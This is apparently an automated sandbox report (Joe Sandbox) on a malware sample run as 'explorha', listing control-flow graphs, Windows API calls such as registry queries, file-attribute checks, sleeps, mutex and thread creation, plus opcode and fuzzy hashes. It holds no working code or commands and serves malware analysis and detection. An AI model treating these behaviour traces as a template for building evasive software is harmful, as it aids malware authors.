                                                                                                      • String ID: H
                                                                                                      • API String ID: 3443242726-2852464175
                                                                                                      • Opcode ID: f87c33a203a049c5144d27553e109c06d344d9cf333486228f0bf7a4f7d4e3ad
                                                                                                      • Instruction ID: c3feecb52edda2cfe2f34b7bcb74a2d8603f76f7c6d991e4b3c4c8ca55c619fe
                                                                                                      • Opcode Fuzzy Hash: f87c33a203a049c5144d27553e109c06d344d9cf333486228f0bf7a4f7d4e3ad
                                                                                                      • Instruction Fuzzy Hash: 8CA10532A141499FDF19AF6CD892BAD3BA1FB47324F18015DF811EB291CB359A12CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Legend: Executed / Not Executed
                                                                                                      • [Control-flow graph image not preserved; first listed block: 8678b0-867932]
                                                                                                      APIs
                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00867A53
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InfoNativeSystem
                                                                                                      • String ID: FcspH7==$FcspIG==$FcsqG7==
                                                                                                      • API String ID: 1721193555-2365427954
                                                                                                      • Opcode ID: 3a1298287b0db4f73d5584cbfbafe0a846c908ae459f83bf352bc8a1afb46121
                                                                                                      • Instruction ID: 5c23e544c6dac9b6aed45f45f36ee09c614b68f3fa41a80d41755d50ae221a7b
                                                                                                      • Opcode Fuzzy Hash: 3a1298287b0db4f73d5584cbfbafe0a846c908ae459f83bf352bc8a1afb46121
                                                                                                      • Instruction Fuzzy Hash: 16D10371E006149BDB14BB68DC567AE7B71FB51328F914298E419EB3C2DB358E848BC3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2829 898561-898596 GetFileType 2830 89859c-8985a7 2829->2830 2831 89864e-898651 2829->2831 2832 8985c9-8985e5 call 895780 GetFileInformationByHandle 2830->2832 2833 8985a9-8985ba call 8988d7 2830->2833 2834 89867a-8986a2 2831->2834 2835 898653-898656 2831->2835 2842 89866b-898678 call 898b6d 2832->2842 2847 8985eb-89862d call 898829 call 8986d1 * 3 2832->2847 2850 8985c0-8985c7 2833->2850 2851 898667-898669 2833->2851 2836 8986bf-8986c1 2834->2836 2837 8986a4-8986b7 2834->2837 2835->2834 2840 898658-89865a 2835->2840 2845 8986c2-8986d0 call 87e681 2836->2845 2837->2836 2856 8986b9-8986bc 2837->2856 2840->2842 2843 89865c-898661 call 898ba3 2840->2843 2842->2851 2843->2851 2865 898632-89864a call 8987f6 2847->2865 2850->2832 2851->2845 2856->2836 2865->2836 2868 89864c 2865->2868 2868->2851
                                                                                                      APIs
                                                                                                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00898583
                                                                                                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 008985DD
                                                                                                      • __dosmaperr.LIBCMT ref: 00898672
                                                                                                        • Part of subcall function 008988D7: __dosmaperr.LIBCMT ref: 0089890C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: File__dosmaperr$HandleInformationType
                                                                                                      • String ID:
                                                                                                      • API String ID: 2531987475-0
                                                                                                      • Opcode ID: ed7c28c574cab085be8e18251a440ca91dad7bd96f8d714bdc24899eb99c9e31
                                                                                                      • Instruction ID: 3a8a8b9dc125f7de240d18893fa9fb8f14e2f6151dae470ec59b3bbf1df36699
                                                                                                      • Opcode Fuzzy Hash: ed7c28c574cab085be8e18251a440ca91dad7bd96f8d714bdc24899eb99c9e31
                                                                                                      • Instruction Fuzzy Hash: F2415B71900649EFDF25AFA5DC459ABB7F9FF9A300B184529F456D7610EB309800CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2869 865e90-865f15 call 895780 RegOpenKeyExA 2872 865f17-865f40 RegQueryValueExA 2869->2872 2873 865f41-865f64 RegCloseKey 2869->2873 2872->2873 2874 865f67-865f6c 2873->2874 2874->2874 2875 865f6e-865f85 call 879750 2874->2875 2878 865f87-865f93 2875->2878 2879 865faf-865fc7 2875->2879 2880 865fa5-865fac call 87ecf8 2878->2880 2881 865f95-865fa3 2878->2881 2882 865ff1-86600c call 87e681 2879->2882 2883 865fc9-865fd5 2879->2883 2880->2879 2881->2880 2885 86600d-866012 call 8982fa 2881->2885 2887 865fe7-865fee call 87ecf8 2883->2887 2888 865fd7-865fe5 2883->2888 2887->2882 2888->2885 2888->2887
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 00865F0D
                                                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00865F3B
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00865F47
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3677997916-0
                                                                                                      • Opcode ID: fa2d826a131e69be771c2754ed9ccd4fa9ef2a372e7215758bf133e042035a8b
                                                                                                      • Instruction ID: 348c718b8be42180d7ac95a2bb2cfd995601ea59fe0f8a0ee42cc7f13df0dc8f
                                                                                                      • Opcode Fuzzy Hash: fa2d826a131e69be771c2754ed9ccd4fa9ef2a372e7215758bf133e042035a8b
                                                                                                      • Instruction Fuzzy Hash: 0541D3B1510508ABEB28DF28CC41BED77B9FB45304F1082ACF919E76C1DB759A84CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2895 869675-869695 GetFileAttributesA 2898 869697-8696a3 2895->2898 2899 8696c3-8696df 2895->2899 2902 8696a5-8696b3 2898->2902 2903 8696b9-8696c0 call 87ecf8 2898->2903 2900 8696e1-8696ed 2899->2900 2901 86970d-86972c 2899->2901 2906 869703-86970a call 87ecf8 2900->2906 2907 8696ef-8696fd 2900->2907 2908 86972e-86973a 2901->2908 2909 86975a-86a3e6 call 879750 2901->2909 2902->2903 2904 86a3ec 2902->2904 2903->2899 2911 86a423-86a458 Sleep CreateMutexA 2904->2911 2912 86a3ec call 8982fa 2904->2912 2906->2901 2907->2904 2907->2906 2915 869750-869757 call 87ecf8 2908->2915 2916 86973c-86974a 2908->2916 2923 86a45e-86a464 2911->2923 2912->2911 2915->2909 2916->2904 2916->2915 2925 86a466 2923->2925 2926 86a467-86a46f call 897cb9 2923->2926
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869678
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: 303754bd131b3bff8715eb6caf91ceaa3c0b82538b573a091c80a48be9200239
                                                                                                      • Instruction ID: a941075b446f4329a90f7bc887b34ef3236ec9ec6de7db18bc4afe1eed0abc88
                                                                                                      • Opcode Fuzzy Hash: 303754bd131b3bff8715eb6caf91ceaa3c0b82538b573a091c80a48be9200239
                                                                                                      • Instruction Fuzzy Hash: 373146716102048BEB0CEF7CDD88BADBA6AFB85314F208218E058EB3D5C77599808B51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2929 8697aa-8697ca GetFileAttributesA 2932 8697cc-8697d8 2929->2932 2933 8697f8-869814 2929->2933 2936 8697ee-8697f5 call 87ecf8 2932->2936 2937 8697da-8697e8 2932->2937 2934 869816-869822 2933->2934 2935 869842-869861 2933->2935 2939 869824-869832 2934->2939 2940 869838-86983f call 87ecf8 2934->2940 2941 869863-86986f 2935->2941 2942 86988f-86a3e6 call 879750 2935->2942 2936->2933 2937->2936 2943 86a3f1 2937->2943 2939->2940 2939->2943 2940->2935 2948 869885-86988c call 87ecf8 2941->2948 2949 869871-86987f 2941->2949 2945 86a423-86a458 Sleep CreateMutexA 2943->2945 2946 86a3f1 call 8982fa 2943->2946 2957 86a45e-86a464 2945->2957 2946->2945 2948->2942 2949->2943 2949->2948 2959 86a466 2957->2959 2960 86a467-86a46f call 897cb9 2957->2960
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 008697AD
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: cd42925b9b3af5b06b2f13809cfb8bfc7ea5e1ad232da94de86ce4f0b1eb319a
                                                                                                      • Instruction ID: 5897bce82ac9ad75ed90d5f4450d2607119e2db0da7ab160a5beb7693b8a6382
                                                                                                      • Opcode Fuzzy Hash: cd42925b9b3af5b06b2f13809cfb8bfc7ea5e1ad232da94de86ce4f0b1eb319a
                                                                                                      • Instruction Fuzzy Hash: A33146716101048BEF0CDF6CDD887ADB666FF86314F20826CE458EB3D5C77599808B61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph not reproduced (legend: executed / not executed). First block 869a14-869a34 calls GetFileAttributesA; block 86a423-86a458 calls Sleep and CreateMutexA.]
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869A17
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: 3999692b9b50f0b77921b1b4bc000c210ac8b89e0dd9269fc4819b1bd8046218
                                                                                                      • Instruction ID: a6a5353527413a7a10b6d14f36797f728769acdf7f318a43270d31298ff0a3e6
                                                                                                      • Opcode Fuzzy Hash: 3999692b9b50f0b77921b1b4bc000c210ac8b89e0dd9269fc4819b1bd8046218
                                                                                                      • Instruction Fuzzy Hash: F03166727141048BEB08DBACDD88BADB7A6FB85311F24821CE454EB3C5D77699808B11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph not reproduced (legend: executed / not executed). First block 869b49-869b69 calls GetFileAttributesA; block 86a423-86a458 calls Sleep and CreateMutexA.]
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869B4C
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: 0d6ded3709a46a3a6a85e5c537fe6f0f75fcf209df97c129dc6a1a3163f7dcb4
                                                                                                      • Instruction ID: c7da16a97a96595e9407f7114f5e961e64f1c625b47934866c9d2ca5e6c47140
                                                                                                      • Opcode Fuzzy Hash: 0d6ded3709a46a3a6a85e5c537fe6f0f75fcf209df97c129dc6a1a3163f7dcb4
                                                                                                      • Instruction Fuzzy Hash: F73146717001089BEB0CDB6CEDC9BADB7A6FBC5324F248218E454EB3D5C775A9808B55
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph not reproduced (legend: executed / not executed). First block 869c7e-869c9e calls GetFileAttributesA; block 86a423-86a458 calls Sleep and CreateMutexA.]
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869C81
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: 0b3a3769c3d64b9b1f53bbad06a892a2637b99fdf839046a111c11bbd33cc91e
                                                                                                      • Instruction ID: ac0dabdc4792f778274ab7a9904f6b7920bc99fe2f8a51e5d584976710e8110b
                                                                                                      • Opcode Fuzzy Hash: 0b3a3769c3d64b9b1f53bbad06a892a2637b99fdf839046a111c11bbd33cc91e
                                                                                                      • Instruction Fuzzy Hash: 153144727001048BEF08DB7CDD88BADBBA6FB85314F208228E454EB3D5D77599808B12
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 3065 869db3-869dd3 GetFileAttributesA 3068 869dd5-869de1 3065->3068 3069 869e01-869e1d 3065->3069 3070 869df7-869dfe call 87ecf8 3068->3070 3071 869de3-869df1 3068->3071 3072 869e1f-869e2b 3069->3072 3073 869e4b-869e6a 3069->3073 3070->3069 3071->3070 3076 86a40a 3071->3076 3078 869e41-869e48 call 87ecf8 3072->3078 3079 869e2d-869e3b 3072->3079 3074 869e6c-869e78 3073->3074 3075 869e98-86a3e6 call 879750 3073->3075 3081 869e8e-869e95 call 87ecf8 3074->3081 3082 869e7a-869e88 3074->3082 3084 86a423-86a458 Sleep CreateMutexA 3076->3084 3085 86a40a call 8982fa 3076->3085 3078->3073 3079->3076 3079->3078 3081->3075 3082->3076 3082->3081 3093 86a45e-86a464 3084->3093 3085->3084 3095 86a466 3093->3095 3096 86a467-86a46f call 897cb9 3093->3096
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869DB6
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: a328794e78827ec6e0fad08a658902d1e2acef1e59fb35692f073c53dcdbebae
                                                                                                      • Instruction ID: d006cee13fb5ec7b82742ce70921607bd56ba99b71e8bbd9098ff298bc933fc7
                                                                                                      • Opcode Fuzzy Hash: a328794e78827ec6e0fad08a658902d1e2acef1e59fb35692f073c53dcdbebae
                                                                                                      • Instruction Fuzzy Hash: B5314472A001449BEB18DB6CCDC8BADB766FF85314F24822CE455EB3D5C7B699808B11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 3099 869ee8-869f08 GetFileAttributesA 3102 869f36-869f52 3099->3102 3103 869f0a-869f16 3099->3103 3106 869f54-869f60 3102->3106 3107 869f80-869f9f 3102->3107 3104 869f2c-869f33 call 87ecf8 3103->3104 3105 869f18-869f26 3103->3105 3104->3102 3105->3104 3108 86a40f 3105->3108 3110 869f76-869f7d call 87ecf8 3106->3110 3111 869f62-869f70 3106->3111 3112 869fa1-869fad 3107->3112 3113 869fcd-86a3e6 call 879750 3107->3113 3115 86a414-86a458 call 8982fa * 3 Sleep CreateMutexA 3108->3115 3116 86a40f call 8982fa 3108->3116 3110->3107 3111->3108 3111->3110 3119 869fc3-869fca call 87ecf8 3112->3119 3120 869faf-869fbd 3112->3120 3134 86a45e-86a464 3115->3134 3116->3115 3119->3113 3120->3108 3120->3119 3135 86a466 3134->3135 3136 86a467-86a46f call 897cb9 3134->3136
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869EEB
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: b17e3cdfbfffa897c3361e30d9ccb10cf3419e84e0e0662576ac72cfadadb980
                                                                                                      • Instruction ID: 49493b65334d953f13a89a210c14841ac0dc690d74c65823fb2cb3b6535ba6f1
                                                                                                      • Opcode Fuzzy Hash: b17e3cdfbfffa897c3361e30d9ccb10cf3419e84e0e0662576ac72cfadadb980
                                                                                                      • Instruction Fuzzy Hash: 7A3166316001048BEF08EBBCCD89B9DB676FF86314F248218E055EB3D9CB7599808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 3139 86a01d-86a03d GetFileAttributesA 3142 86a03f-86a04b 3139->3142 3143 86a06b-86a087 3139->3143 3144 86a061-86a068 call 87ecf8 3142->3144 3145 86a04d-86a05b 3142->3145 3146 86a0b5-86a0d4 3143->3146 3147 86a089-86a095 3143->3147 3144->3143 3145->3144 3150 86a414-86a458 call 8982fa * 3 Sleep CreateMutexA 3145->3150 3148 86a0d6-86a0e2 3146->3148 3149 86a102-86a3e6 call 879750 3146->3149 3152 86a097-86a0a5 3147->3152 3153 86a0ab-86a0b2 call 87ecf8 3147->3153 3155 86a0e4-86a0f2 3148->3155 3156 86a0f8-86a0ff call 87ecf8 3148->3156 3172 86a45e-86a464 3150->3172 3152->3150 3152->3153 3153->3146 3155->3150 3155->3156 3156->3149 3173 86a466 3172->3173 3174 86a467-86a46f call 897cb9 3172->3174
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 0086A020
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: d9725ff55ff549158a077bede451c5130360605c539133e03153f2c68cea4d3b
                                                                                                      • Instruction ID: cb103111119b374de23f44a7c5c8bf9ca2c190246f0d1b67e060f75e4c1a61f1
                                                                                                      • Opcode Fuzzy Hash: d9725ff55ff549158a077bede451c5130360605c539133e03153f2c68cea4d3b
                                                                                                      • Instruction Fuzzy Hash: B0310971600504DBEB0CEB6CCD89B6DB672FB86318F248258E415EB3D6CB7599808B63
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 0086A155
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: f9b61f4c14a8b760f2acb22aa3e63dd8deeba2fe9ede26a56d72adbb8eaaf958
                                                                                                      • Instruction ID: e5309cf94ba3761a3ade917f687e532a3505d13f1484b2eb37da90720420ba68
                                                                                                      • Opcode Fuzzy Hash: f9b61f4c14a8b760f2acb22aa3e63dd8deeba2fe9ede26a56d72adbb8eaaf958
                                                                                                      • Instruction Fuzzy Hash: 7B3126716001049BEB0CDB6CDD89BADB772FB86314F248218E425EB3D6CB7699808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 0086A28A
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: 6764ef9b44216c8afae9c602fa983929970d1700da82fbed14e1cf5f4cb1310b
                                                                                                      • Instruction ID: bd3472fbc751c413858c18e785e8e53c5e2d0a4cacabe20d01fbf7eac349ef43
                                                                                                      • Opcode Fuzzy Hash: 6764ef9b44216c8afae9c602fa983929970d1700da82fbed14e1cf5f4cb1310b
                                                                                                      • Instruction Fuzzy Hash: 5A3126717401089BEB0CDB6CCE89BADB762FB85314F248218E414FB7D6CB7599808B12
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00018200,00000000,00000000,00000000), ref: 00878336
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00018290,00000000,00000000,00000000), ref: 00878347
                                                                                                      • Sleep.KERNELBASE(00007530), ref: 00878355
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread$Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 422425972-0
                                                                                                      • Opcode ID: 56897797c1fbbae334c4d1c5c2d4d70c11eb701fc4a1ee426f6ade139e9fe91f
                                                                                                      • Instruction ID: 18c24bce9ac6ab2768f786134c71d389544cb130befa79857d9089f861c28342
                                                                                                      • Opcode Fuzzy Hash: 56897797c1fbbae334c4d1c5c2d4d70c11eb701fc4a1ee426f6ade139e9fe91f
                                                                                                      • Instruction Fuzzy Hash: 7CD0C931BE8B28B6F13062641C07F452A15B709F52F344002B71CBF2D40AC474008B9D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
